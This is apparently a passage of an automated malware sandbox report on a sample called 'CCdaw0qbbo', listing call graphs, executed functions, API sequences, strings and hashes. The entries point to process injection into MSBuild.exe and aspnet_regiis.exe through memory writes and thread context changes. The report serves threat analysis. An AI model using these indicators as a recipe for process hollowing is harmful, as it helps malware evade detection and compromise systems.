13982->13985 13984 6e36b259 13984->13838 13986 6e36acde 13985->13986 13987 6e36ace4 13985->13987 13989 6e36cba7 _unexpected 6 API calls 13986->13989 13988 6e36cbe6 _unexpected 6 API calls 13987->13988 13991 6e36ace8 SetLastError 13987->13991 13990 6e36ad00 13988->13990 13989->13987 13990->13991 14008 6e36b267 13990->14008 13991->13984 13995 6e36ad2e 13998 6e36cbe6 _unexpected 6 API calls 13995->13998 13996 6e36ad1d 13997 6e36cbe6 _unexpected 6 API calls 13996->13997 13999 6e36ad2b 13997->13999 14000 6e36ad3a 13998->14000 14003 6e36b2c4 ___free_lconv_mon 12 API calls 13999->14003 14001 6e36ad55 14000->14001 14002 6e36ad3e 14000->14002 14015 6e36a979 14001->14015 14005 6e36cbe6 _unexpected 6 API calls 14002->14005 14003->13991 14005->13999 14007 6e36b2c4 ___free_lconv_mon 12 API calls 14007->13991 14013 6e36b274 _unexpected 14008->14013 14009 6e36b2b4 14012 6e36b254 __dosmaperr 13 API calls 14009->14012 14010 6e36b29f HeapAlloc 14011 6e36ad15 14010->14011 14010->14013 14011->13995 14011->13996 14012->14011 14013->14009 14013->14010 14020 6e36d000 14013->14020 14029 6e36a80d 14015->14029 14023 6e36d02c 14020->14023 14024 6e36d038 ___scrt_is_nonwritable_in_current_image 14023->14024 14025 6e36aea3 __InternalCxxFrameHandler EnterCriticalSection 14024->14025 14026 6e36d043 __InternalCxxFrameHandler 14025->14026 14027 6e36d07a _unexpected LeaveCriticalSection 14026->14027 14028 6e36d00b 14027->14028 14028->14013 14030 6e36a819 ___scrt_is_nonwritable_in_current_image 14029->14030 14043 6e36aea3 EnterCriticalSection 14030->14043 14032 6e36a823 14044 6e36a853 14032->14044 14035 6e36a91f 14036 6e36a92b ___scrt_is_nonwritable_in_current_image 14035->14036 14047 6e36aea3 EnterCriticalSection 14036->14047 14038 6e36a935 14039 6e36ab00 _unexpected 14 API calls 14038->14039 14040 6e36a94d 14039->14040 14048 6e36a96d 14040->14048 14043->14032 14045 6e36aeeb __InternalCxxFrameHandler LeaveCriticalSection 14044->14045 14046 6e36a841 14045->14046 14046->14035 14047->14038 14049 6e36aeeb __InternalCxxFrameHandler LeaveCriticalSection 14048->14049 14050 6e36a95b 14049->14050 14050->14007 14052 6e366dd4 14051->14052 14053 6e36802d 14051->14053 14052->13600 14059 6e3686f3 14053->14059 14056 6e36872e ___vcrt_FlsSetValue 6 API calls 14057 6e368043 14056->14057 14064 6e368007 14057->14064 14060 6e368592 ___vcrt_FlsSetValue 5 API calls 14059->14060 14061 6e36870d 14060->14061 14062 6e368725 TlsGetValue 14061->14062 14063 6e368034 14061->14063 14062->14063 14063->14056 14065 6e368011 14064->14065 14067 6e36801e 14064->14067 14065->14067 14068 6e36a4d9 14065->14068 14067->14052 14069 6e36b2c4 ___free_lconv_mon 14 API calls 14068->14069 14070 6e36a4f1 14069->14070 14070->14067 14077 6e36805c 14071->14077 14073 6e366db0 14073->13623 14074 6e36a448 14073->14074 14075 6e36acc8 __dosmaperr 14 API calls 14074->14075 14076 6e366dbc 14075->14076 14076->13626 14076->13627 14078 6e368065 14077->14078 14079 6e368068 GetLastError 14077->14079 14078->14073 14080 6e3686f3 ___vcrt_FlsGetValue 6 API calls 14079->14080 14081 6e36807d 14080->14081 14082 6e3680e2 SetLastError 14081->14082 14083 6e36872e ___vcrt_FlsSetValue 6 API calls 14081->14083 14090 6e36809c 14081->14090 14082->14073 14084 6e368096 __InternalCxxFrameHandler 14083->14084 14085 6e3680be 14084->14085 14086 6e36872e ___vcrt_FlsSetValue 6 API calls 14084->14086 14084->14090 14087 6e36872e ___vcrt_FlsSetValue 6 API calls 14085->14087 14088 6e3680d2 14085->14088 14086->14085 14087->14088 14089 6e36a4d9 ___std_exception_destroy 14 API calls 14088->14089 14089->14090 14090->14082 14092 6e366e10 ___scrt_release_startup_lock 14091->14092 14093 6e366e14 14092->14093 14096 6e366e20 __DllMainCRTStartup@12 14092->14096 14116 6e36a2b2 14093->14116 14095 6e366e1e 14095->13634 14097 6e366e2d 14096->14097 14120 6e369a9b 14096->14120 14097->13634 14189 6e367c4a InterlockedFlushSList 14100->14189 14104 6e366fb8 14103->14104 14105 6e36695e 14104->14105 14193 6e36a45b 14104->14193 14109 6e36699a 14105->14109 14107 6e366fc6 14108 6e367c9f ___scrt_uninitialize_crt 7 API calls 14107->14108 14108->14105 14292 6e366e2e 14109->14292 14113 6e3660a3 14112->14113 14114 6e366790 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14113->14114 14115 6e366743 14114->14115 14115->13648 14115->13650 14117 6e36a2be __EH_prolog3 14116->14117 14131 6e36a17d 14117->14131 14119 6e36a2e5 __DllMainCRTStartup@12 14119->14095 14121 6e369ac8 14120->14121 14129 6e369ad9 14120->14129 14148 6e369b63 GetModuleHandleW 14121->14148 14125 6e369b17 14125->13634 14155 6e36994b 14129->14155 14132 6e36a189 ___scrt_is_nonwritable_in_current_image 14131->14132 14139 6e36aea3 EnterCriticalSection 14132->14139 14134 6e36a197 14140 6e36a1d8 14134->14140 14139->14134 14141 6e36a1f7 14140->14141 14142 6e36a1a4 14140->14142 14141->14142 14143 6e36b2c4 ___free_lconv_mon 14 API calls 14141->14143 14144 6e36a1cc 14142->14144 14143->14142 14147 6e36aeeb LeaveCriticalSection 14144->14147 14146 6e36a1b5 14146->14119 14147->14146 14149 6e369acd 14148->14149 14149->14129 14150 6e369bbe GetModuleHandleExW 14149->14150 14151 6e369c11 14150->14151 14152 6e369bfd GetProcAddress 14150->14152 14153 6e369c24 FreeLibrary 14151->14153 14154 6e369c2d 14151->14154 14152->14151 14153->14154 14154->14129 14156 6e369957 ___scrt_is_nonwritable_in_current_image 14155->14156 14170 6e36aea3 EnterCriticalSection 14156->14170 14158 6e369961 14171 6e3699b3 14158->14171 14160 6e36996e 14175 6e36998c 14160->14175 14163 6e369b32 14179 6e369ba5 14163->14179 14165 6e369b3c 14166 6e369b50 14165->14166 14167 6e369b40 GetCurrentProcess TerminateProcess 14165->14167 14168 6e369bbe __InternalCxxFrameHandler 3 API calls 14166->14168 14167->14166 14169 6e369b58 ExitProcess 14168->14169 14170->14158 14174 6e3699bf ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 14171->14174 14172 6e36a2b2 __DllMainCRTStartup@12 14 API calls 14173 6e369a23 __InternalCxxFrameHandler 14172->14173 14173->14160 14174->14172 14174->14173 14178 6e36aeeb LeaveCriticalSection 14175->14178 14177 6e36997a 14177->14125 14177->14163 14178->14177 14182 6e36af27 14179->14182 14181 6e369baa __InternalCxxFrameHandler 14181->14165 14183 6e36af36 __InternalCxxFrameHandler 14182->14183 14184 6e36af43 14183->14184 14186 6e36caca 14183->14186 14184->14181 14187 6e36ca45 _unexpected 5 API calls 14186->14187 14188 6e36cae6 14187->14188 14188->14184 14190 6e367c5a 14189->14190 14191 6e366cd1 14189->14191 14190->14191 14192 6e36a4d9 ___std_exception_destroy 14 API calls 14190->14192 14191->13639 14192->14190 14194 6e36a466 14193->14194 14195 6e36a478 ___scrt_uninitialize_crt 14193->14195 14196 6e36a474 14194->14196 14198 6e36d695 14194->14198 14195->14107 14196->14107 14201 6e36d526 14198->14201 14204 6e36d47a 14201->14204 14205 6e36d486 ___scrt_is_nonwritable_in_current_image 14204->14205 14212 6e36aea3 EnterCriticalSection 14205->14212 14207 6e36d4fc 14221 6e36d51a 14207->14221 14211 6e36d490 ___scrt_uninitialize_crt 14211->14207 14213 6e36d3ee 14211->14213 14212->14211 14214 6e36d3fa ___scrt_is_nonwritable_in_current_image 14213->14214 14224 6e36d7b2 EnterCriticalSection 14214->14224 14216 6e36d43d 14236 6e36d46e 14216->14236 14217 6e36d404 ___scrt_uninitialize_crt 14217->14216 14225 6e36d630 14217->14225 14291 6e36aeeb LeaveCriticalSection 14221->14291 14223 6e36d508 14223->14196 14224->14217 14226 6e36d645 ___std_exception_copy 14225->14226 14227 6e36d657 14226->14227 14228 6e36d64c 14226->14228 14239 6e36d5c7 14227->14239 14229 6e36d526 ___scrt_uninitialize_crt 68 API calls 14228->14229 14233 6e36d652 ___std_exception_copy 14229->14233 14233->14216 14234 6e36d678 14252 6e36ecc5 14234->14252 14290 6e36d7c6 LeaveCriticalSection 14236->14290 14238 6e36d45c 14238->14211 14240 6e36d5e0 14239->14240 14244 6e36d607 14239->14244 14241 6e36da17 ___scrt_uninitialize_crt 29 API calls 14240->14241 14240->14244 14242 6e36d5fc 14241->14242 14263 6e36f4e4 14242->14263 14244->14233 14245 6e36da17 14244->14245 14246 6e36da23 14245->14246 14247 6e36da38 14245->14247 14248 6e36b254 __dosmaperr 14 API calls 14246->14248 14247->14234 14249 6e36da28 14248->14249 14274 6e36b173 14249->14274 14253 6e36ecd6 14252->14253 14254 6e36ece3 14252->14254 14256 6e36b254 __dosmaperr 14 API calls 14253->14256 14255 6e36ed2c 14254->14255 14259 6e36ed0a 14254->14259 14258 6e36b254 __dosmaperr 14 API calls 14255->14258 14257 6e36ecdb 14256->14257 14257->14233 14260 6e36ed31 14258->14260 14277 6e36ec23 14259->14277 14262 6e36b173 ___std_exception_copy 29 API calls 14260->14262 14262->14257 14265 6e36f4f0 ___scrt_is_nonwritable_in_current_image 14263->14265 14264 6e36f4f8 14264->14244 14265->14264 14266 6e36f531 14265->14266 14268 6e36f577 14265->14268 14267 6e36b0f6 ___std_exception_copy 29 API calls 14266->14267 14267->14264 14269 6e36eae2 ___scrt_uninitialize_crt EnterCriticalSection 14268->14269 14270 6e36f57d 14269->14270 14271 6e36f59b 14270->14271 14272 6e36f5f5 ___scrt_uninitialize_crt 62 API calls 14270->14272 14273 6e36f5ed ___scrt_uninitialize_crt LeaveCriticalSection 14271->14273 14272->14271 14273->14264 14275 6e36b0bf ___std_exception_copy 29 API calls 14274->14275 14276 6e36b17f 14275->14276 14276->14234 14278 6e36ec2f ___scrt_is_nonwritable_in_current_image 14277->14278 14279 6e36eae2 ___scrt_uninitialize_crt EnterCriticalSection 14278->14279 14280 6e36ec3e 14279->14280 14281 6e36ec83 14280->14281 14282 6e36ebb9 ___scrt_uninitialize_crt 29 API calls 14280->14282 14283 6e36b254 __dosmaperr 14 API calls 14281->14283 14284 6e36ec6a FlushFileBuffers 14282->14284 14285 6e36ec8a 14283->14285 14284->14285 14286 6e36ec76 GetLastError 14284->14286 14288 6e36ecb9 ___scrt_uninitialize_crt LeaveCriticalSection 14285->14288 14287 6e36b241 __dosmaperr 14 API calls 14286->14287 14287->14281 14289 6e36eca2 14288->14289 14289->14257 14290->14238 14291->14223 14297 6e36a48b 14292->14297 14295 6e368121 ___vcrt_uninitialize_ptd 6 API calls 14296 6e36699f 14295->14296 14296->13647 14300 6e36ae48 14297->14300 14301 6e36ae52 14300->14301 14302 6e366e35 14300->14302 14304 6e36cb68 14301->14304 14302->14295 14305 6e36ca45 _unexpected 5 API calls 14304->14305 14306 6e36cb84 14305->14306 14307 6e36cb9f TlsFree 14306->14307 14308 6e36cb8d 14306->14308 14308->14302 14309 6e366ade 14310 6e366ae7 14309->14310 14311 6e366aec 14309->14311 14330 6e366c70 14310->14330 14315 6e3669a8 14311->14315 14316 6e3669b4 ___scrt_is_nonwritable_in_current_image 14315->14316 14317 6e3669dd dllmain_raw 14316->14317 14319 6e3669c3 14316->14319 14320 6e3669d8 14316->14320 14318 6e3669f7 dllmain_crt_dispatch 14317->14318 14317->14319 14318->14319 14318->14320 14321 6e366040 __DllMainCRTStartup@12 5 API calls 14320->14321 14322 6e366a18 14321->14322 14323 6e366a49 14322->14323 14325 6e366040 __DllMainCRTStartup@12 5 API calls 14322->14325 14323->14319 14324 6e366a52 dllmain_crt_dispatch 14323->14324 14324->14319 14326 6e366a65 dllmain_raw 14324->14326 14327 6e366a30 14325->14327 14326->14319 14328 6e3668f8 __DllMainCRTStartup@12 86 API calls 14327->14328 14329 6e366a3e dllmain_raw 14328->14329 14329->14323 14331 6e366c86 14330->14331 14333 6e366c8f 14331->14333 14334 6e366c23 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 14331->14334 14333->14311 14334->14333

                        Executed Functions

                        Function 6E357E10 Relevance: 130.7, APIs: 23, Strings: 44, Instructions: 13477injectionmemorythreadCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: MemoryProcess$Write$CloseHandleWindow$AllocThreadVirtual$ConsoleContextShowWow64$ReadResume
                        • String ID: >$>$%!LU$%!LU$1\o$7ys=$:{?$<J%$<J%$?WYW$@$@uY$BS3?$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$CXWX$D$Elp7$T0Rf$W8S$X/$\0)$]o3$fThA$h46$h=Rh$h=Rh$hk$kernel32.dll$ntdll.dll$sx,$wH/}$wH/}$wL3$#3$cP;$i%2$u(e$.4$B;$B;$Qk$u:$xJ
                        • API String ID: 90286429-1085279266
                        • Opcode ID: dc26b6732b91ba4dcb407871349d8d2e0531ed1d3239f1fa729f9a938058faed
                        • Instruction ID: ba46a02fd0e4fa1191a02f5d256618ea8bfd2c025be3fcfab95617a0fc2c9245
                        • Opcode Fuzzy Hash: dc26b6732b91ba4dcb407871349d8d2e0531ed1d3239f1fa729f9a938058faed
                        • Instruction Fuzzy Hash: A1343131A1A212CFCF14CF7DC9E07C977F5AB86351F10529AE405AB398C63A9A89CF51
                        Function 6E3511E0 Relevance: 58.6, APIs: 17, Strings: 13, Instructions: 6131memoryfileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandleModuleProtectVirtual$CreateCurrentInformationProcess$ChangeFindMappingNameNotificationView
                        • String ID: (3[k$,=}$>XF$@$XY!B$Z.w$d"RH$d"RH$m1$$m1$$.#$M:X$M:X
                        • API String ID: 1265710990-72648802
                        • Opcode ID: 5d80966c5f74414d660df9a46eefb579531d80ffab0fe94866d4447ff7744181
                        • Instruction ID: 0dd848c28348493a0782bfa2a6f966d5797c9a7d8ecbe8af741d31d9198d18bf
                        • Opcode Fuzzy Hash: 5d80966c5f74414d660df9a46eefb579531d80ffab0fe94866d4447ff7744181
                        • Instruction Fuzzy Hash: 01B33331A44611CFDB04CEBEC9A4FC8B7F6BB42310F108246D859EB394DA36995ADF61
                        Function 6E357640 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 300libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3271 6e357640-6e35766a GetModuleHandleW 3272 6e357671-6e35767c 3271->3272 3273 6e357796-6e3577df 3272->3273 3274 6e357682-6e35768f 3272->3274 3275 6e357aaa 3273->3275 3277 6e357695-6e3576a2 3274->3277 3278 6e357897-6e35789e 3274->3278 3275->3272 3280 6e357a3d-6e357a56 call 6e366790 3277->3280 3281 6e3576a8-6e3576b5 3277->3281 3278->3275 3284 6e357a2b-6e357a38 3281->3284 3285 6e3576bb-6e3576c8 3281->3285 3284->3275 3288 6e357aa3 3285->3288 3289 6e3576ce-6e3576db 3285->3289 3288->3275 3291 6e357a57-6e357a9e GetProcAddress call 6e367390 3289->3291 3292 6e3576e1-6e3576ee 3289->3292 3291->3275 3296 6e3576f4-6e357701 3292->3296 3297 6e3578a3-6e3578e6 NtQueryInformationProcess 3292->3297 3299 6e3577e4-6e357892 GetProcAddress call 6e367390 3296->3299 3300 6e357707-6e357714 3296->3300 3297->3275 3299->3275 3303 6e3578eb-6e3578fb 3300->3303 3304 6e35771a-6e357727 3300->3304 3303->3275 3307 6e35772d-6e35773a 3304->3307 3308 6e357939-6e3579a7 3304->3308 3310 6e357740-6e35774d 3307->3310 3311 6e357a1f-6e357a26 3307->3311 3308->3275 3313 6e357926-6e357934 3310->3313 3314 6e357753-6e357760 3310->3314 3311->3275 3313->3275 3316 6e357766-6e357773 3314->3316 3317 6e357900-6e35790f 3314->3317 3319 6e357914-6e357921 3316->3319 3320 6e357779-6e357786 3316->3320 3317->3275 3319->3275 3322 6e3579ac-6e357a1a 3320->3322 3323 6e35778c-6e357791 3320->3323 3322->3275 3323->3275
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1625162823.000000006E351000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E350000, based on PE: true
                        • Associated: 00000000.00000002.1625137216.000000006E350000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625210655.000000006E373000.00000002.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000000.00000002.1625262553.000000006E397000.00000002.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6e350000_CCdaw0qbbo.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: NtQueryInformationProcess$ntdll.dll
                        • API String ID: 1646373207-2906145389
                        • Opcode ID: b74e24341a259f70b658f479dc9b36a68f9eefecdcc7d5c3190cdf2d1cb04c6b
                        • Instruction ID: 711a9bb044658541dd98f220f5bbdd53eedb3189530083ca8e570afdea4c32c2
                        • Opcode Fuzzy Hash: b74e24341a259f70b658f479dc9b36a68f9eefecdcc7d5c3190cdf2d1cb04c6b
                        • Instruction Fuzzy Hash: E4B1CD719552098FCF04CFECC598BDEBBF5EB86310F10851EE815AB398E636990A8B51
                        Function 025E08DA Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3464 25e08da-25e08ec 3465 25e0e95-25e0fa5 call 25e00e4 call 25e10b0 3464->3465 3466 25e08f2-25e0908 3464->3466 3486 25e0fa7 3465->3486 3466->3465 3467 25e090e-25e0918 3466->3467 3467->3465 3468 25e091e-25e0932 3467->3468 3468->3465 3470 25e08be-25e08cd 3468->3470 3471 25e0e5a-25e0e94 3470->3471 3472 25e08d3 3470->3472 3472->3471 3487 25e0fac-25e0fc1 3486->3487 3488 25e103b-25e107d call 25e00f4 3487->3488 3489 25e0fc3 3487->3489 3507 25e107f call 25e1998 3488->3507 3508 25e107f call 25e2067 3488->3508 3509 25e107f call 25e1b67 3488->3509 3510 25e107f call 25e1c61 3488->3510 3489->3486 3489->3488 3490 25e0fca-25e0ff4 3489->3490 3491 25e100a-25e1016 3489->3491 3492 25e102b-25e1036 3489->3492 3493 25e1018-25e101b 3489->3493 3494 25e0ff6-25e1008 3489->3494 3490->3487 3491->3487 3492->3487 3495 25e101d-25e1022 3493->3495 3496 25e1024 3493->3496 3494->3487 3499 25e1029 3495->3499 3496->3499 3499->3487 3505 25e1085-25e108e 3507->3505 3508->3505 3509->3505 3510->3505
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: 07ee43a5ae471336a0e08e4e4197e456197e685811a5c58ad06090cafde5fc5c
                        • Instruction ID: c47ec588ab9588601812037d53fa88e9e9952d4717f47d08774ef61e664b91d1
                        • Opcode Fuzzy Hash: 07ee43a5ae471336a0e08e4e4197e456197e685811a5c58ad06090cafde5fc5c
                        • Instruction Fuzzy Hash: F0712431A041958FDF09DB7CC4A16EFBFF2FF89310B18849AD486AB252D6309D06CB95
                        Function 025E0D98 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3511 25e0d98-25e0db6 3512 25e0dbc-25e0dc3 3511->3512 3513 25e0e95-25e0fa5 call 25e00e4 call 25e10b0 3511->3513 3512->3513 3514 25e0dc9-25e0dd3 3512->3514 3529 25e0fa7 3513->3529 3514->3513 3515 25e0dd9-25e0de3 3514->3515 3515->3513 3517 25e0de9-25e0df0 3515->3517 3517->3513 3518 25e0df6-25e0e00 3517->3518 3518->3513 3520 25e0e06-25e0e0f 3518->3520 3520->3513 3530 25e0fac-25e0fc1 3529->3530 3531 25e103b-25e107d call 25e00f4 3530->3531 3532 25e0fc3 3530->3532 3550 25e107f call 25e1998 3531->3550 3551 25e107f call 25e2067 3531->3551 3552 25e107f call 25e1b67 3531->3552 3553 25e107f call 25e1c61 3531->3553 3532->3529 3532->3531 3533 25e0fca-25e0ff4 3532->3533 3534 25e100a-25e1016 3532->3534 3535 25e102b-25e1036 3532->3535 3536 25e1018-25e101b 3532->3536 3537 25e0ff6-25e1008 3532->3537 3533->3530 3534->3530 3535->3530 3538 25e101d-25e1022 3536->3538 3539 25e1024 3536->3539 3537->3530 3542 25e1029 3538->3542 3539->3542 3542->3530 3548 25e1085-25e108e 3550->3548 3551->3548 3552->3548 3553->3548
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: d2e546df0073cf43d8d03d547175db4815b2153445eaabad7548bfcf9d515692
                        • Instruction ID: 11c4c59da755f9f47850b5bcbe8b7358886be1d17374f238878408bc5ec658c1
                        • Opcode Fuzzy Hash: d2e546df0073cf43d8d03d547175db4815b2153445eaabad7548bfcf9d515692
                        • Instruction Fuzzy Hash: AA715A31A042808FDB09DF78D4A55EFBFF2FF85310B1884AAD486AB252D7319C06CB84
                        Function 025E0934 Relevance: 2.7, Strings: 2, Instructions: 198COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3554 25e0934-25e093b 3555 25e0e95-25e0fa5 call 25e00e4 call 25e10b0 3554->3555 3556 25e0941-25e0948 3554->3556 3577 25e0fa7 3555->3577 3556->3555 3557 25e094e-25e095e 3556->3557 3557->3555 3559 25e0964-25e096b 3557->3559 3559->3555 3560 25e0971-25e0985 3559->3560 3560->3555 3562 25e08be-25e08cd 3560->3562 3563 25e0e5a-25e0e94 3562->3563 3564 25e08d3 3562->3564 3564->3563 3578 25e0fac-25e0fc1 3577->3578 3579 25e103b-25e107d call 25e00f4 3578->3579 3580 25e0fc3 3578->3580 3598 25e107f call 25e1998 3579->3598 3599 25e107f call 25e2067 3579->3599 3600 25e107f call 25e1b67 3579->3600 3601 25e107f call 25e1c61 3579->3601 3580->3577 3580->3579 3581 25e0fca-25e0ff4 3580->3581 3582 25e100a-25e1016 3580->3582 3583 25e102b-25e1036 3580->3583 3584 25e1018-25e101b 3580->3584 3585 25e0ff6-25e1008 3580->3585 3581->3578 3582->3578 3583->3578 3586 25e101d-25e1022 3584->3586 3587 25e1024 3584->3587 3585->3578 3590 25e1029 3586->3590 3587->3590 3590->3578 3596 25e1085-25e108e 3598->3596 3599->3596 3600->3596 3601->3596
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: 5dbddad04258d5901f33dc7bb772b43d8648002c9d4a8c2bcfb1d96c89d79ced
                        • Instruction ID: bf18fefebcf78bd129462c0e2049bdbd79168c3de10c406688a4523810dd94e1
                        • Opcode Fuzzy Hash: 5dbddad04258d5901f33dc7bb772b43d8648002c9d4a8c2bcfb1d96c89d79ced
                        • Instruction Fuzzy Hash: CB712631A042908FDB09DB68C4A56EBBFF2FF89320F18C49AD496AB251D771DC05CB85
                        Function 025E0A91 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3724 25e0a91-25e0a98 3725 25e0a9e-25e0aa5 3724->3725 3726 25e0e95-25e0fa5 call 25e00e4 call 25e10b0 3724->3726 3725->3726 3729 25e0aab-25e0abb 3725->3729 3741 25e0fa7 3726->3741 3729->3726 3730 25e0ac1-25e0ac8 3729->3730 3730->3726 3732 25e0ace-25e0add 3730->3732 3732->3726 3742 25e0fac-25e0fc1 3741->3742 3743 25e103b-25e107d call 25e00f4 3742->3743 3744 25e0fc3 3742->3744 3762 25e107f call 25e1998 3743->3762 3763 25e107f call 25e2067 3743->3763 3764 25e107f call 25e1b67 3743->3764 3765 25e107f call 25e1c61 3743->3765 3744->3741 3744->3743 3745 25e0fca-25e0ff4 3744->3745 3746 25e100a-25e1016 3744->3746 3747 25e102b-25e1036 3744->3747 3748 25e1018-25e101b 3744->3748 3749 25e0ff6-25e1008 3744->3749 3745->3742 3746->3742 3747->3742 3750 25e101d-25e1022 3748->3750 3751 25e1024 3748->3751 3749->3742 3754 25e1029 3750->3754 3751->3754 3754->3742 3760 25e1085-25e108e 3762->3760 3763->3760 3764->3760 3765->3760
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: 0428663dbf83f0c7c3832399650a8657f1afd7b4bc95322e50a6d536cbc6a5df
                        • Instruction ID: 22051813c49a84b9176303a09975605ec1a9d4b6e1bc146f4f59918d8f14c432
                        • Opcode Fuzzy Hash: 0428663dbf83f0c7c3832399650a8657f1afd7b4bc95322e50a6d536cbc6a5df
                        • Instruction Fuzzy Hash: CB613871A042908FDB09DF78C4A55EBBFF2FF89220B15C49AD496AB251D7309D05CB94
                        Function 025E09E0 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3683 25e09e0-25e09e7 3684 25e09ed-25e09f4 3683->3684 3685 25e0e95-25e0fa5 call 25e00e4 call 25e10b0 3683->3685 3684->3685 3686 25e09fa-25e0a0a 3684->3686 3699 25e0fa7 3685->3699 3686->3685 3688 25e0a10-25e0a17 3686->3688 3688->3685 3689 25e0a1d-25e0a2c 3688->3689 3689->3685 3700 25e0fac-25e0fc1 3699->3700 3701 25e103b-25e107d call 25e00f4 3700->3701 3702 25e0fc3 3700->3702 3720 25e107f call 25e1998 3701->3720 3721 25e107f call 25e2067 3701->3721 3722 25e107f call 25e1b67 3701->3722 3723 25e107f call 25e1c61 3701->3723 3702->3699 3702->3701 3703 25e0fca-25e0ff4 3702->3703 3704 25e100a-25e1016 3702->3704 3705 25e102b-25e1036 3702->3705 3706 25e1018-25e101b 3702->3706 3707 25e0ff6-25e1008 3702->3707 3703->3700 3704->3700 3705->3700 3708 25e101d-25e1022 3706->3708 3709 25e1024 3706->3709 3707->3700 3712 25e1029 3708->3712 3709->3712 3712->3700 3718 25e1085-25e108e 3720->3718 3721->3718 3722->3718 3723->3718
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1622651703.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_25e0000_CCdaw0qbbo.jbxd
                        Similarity
                        • API ID:
                        • String ID: Tekq$Tekq
                        • API String ID: 0-2269808460
                        • Opcode ID: 6bb77fedb1ea38db904973aa9e18c5439300835aa2f180e42a0e3bc984a3747f
                        • Instruction ID: 41e1c4b801e97f39238524dcb66f51fcd44796bb47b7bee829d87cd35694f46f
                        • Opcode Fuzzy Hash: 6bb77fedb1ea38db904973aa9e18c5439300835aa2f180e42a0e3bc984a3747f
